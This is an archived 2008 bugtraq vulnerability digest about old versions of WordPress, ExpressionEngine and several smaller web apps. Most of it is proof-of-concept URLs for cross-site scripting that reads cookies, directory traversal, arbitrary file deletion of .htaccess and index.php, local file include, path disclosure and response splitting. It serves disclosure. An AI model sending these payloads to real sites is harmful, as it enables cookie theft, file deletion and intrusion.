what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

vuln-summary.txt

vuln-summary.txt
Posted Jan 3, 2008
Site websecurity.com.ua

A digest of vulnerabilities listing specific findings for WordPress, AwesomeTemplateEngine, PRO-Search, RotaBanner Local, and ExpressionEngine.

tags | exploit, local, vulnerability
SHA-256 | 527aad22c26fdf3cd81f425de9a6e4020b2f865c0da39406fb7296264512783a
Download | Favorite | View

vuln-summary.txt

Change Mirror Download
Dear bugtraq,

  Below    is    a    digest    of    vulnerabilities    published    by
  http://securityvulns.com/ and believed to be previously unpublished in
  English.    All    vulnerabilities    were    reported   by   MustLive
  (http://websecurity.com.ua/).

  1. AwesomeTemplateEngine Crossite scripting

  Multiple crossite scripting (require register_globvals):

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument784.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1694/

  2. Wordpress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    Invalid request disclosures database structure and local paths:

       http://site/?feed=rss2&p=1
   
    Original article (in Russian): http://securityvulns.ru/Sdocument663.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1634/
    
   2.2 crossite scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

    Original article (in Russian): http://securityvulns.ru/Sdocument714.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1658/

   2.3  Directory  traversal, Arbitrary file deletion, Denial of Service
   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

   Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

   XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument755.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1676/

  2.4  Local  file include, Directory traversal and Full path disclosure
  (WordPress  <=  2.0.11  and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

  Local file include and Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess
http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/templates.php?page=\..\..\file.php
http://sites/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

  Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

  Attacks with backslash are possible in Windows version.

  Original article (in Russian):
           http://securityvulns.ru/Sdocument762.html
           http://securityvulns.ru/Sdocument768.html
           http://securityvulns.ru/Sdocument773.html
           http://securityvulns.ru/Sdocument772.html
  Additional detail (in Ukrainian):
           http://websecurity.com.ua/1679/
           http://websecurity.com.ua/1683/
           http://websecurity.com.ua/1686/
           http://websecurity.com.ua/1687/


3. Crossite scripting and Denial of Service in PRO-Search <= 0.17

 XSS:

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Denial of Service:

http://site/?show_page=20000&time=0

 Original article (in Russian): http://securityvulns.ru/Sdocument731.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4.  Persistant  crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)

 POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

 with different form fields.

 Exploits:

          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

 Original article (in Russian):
          http://securityvulns.ru/Sdocument667.html
          http://securityvulns.ru/Sdocument546.html
 Additional details (in Ukrainian):
          http://websecurity.com.ua/1641/
          http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 crossite scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument625.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument472.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1454/
 
-=-=-=-

 There  are  also  few vulnerabilities published in English as a part of
 the Month of Bugs in CAPTCHA:
 
Cryptographp  <=  1.2  WordPress plugin multiple persistant crossite
scriptings

 Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

 Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

 Original article: http://websecurity.com.ua/1588/
 

 
-- 
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close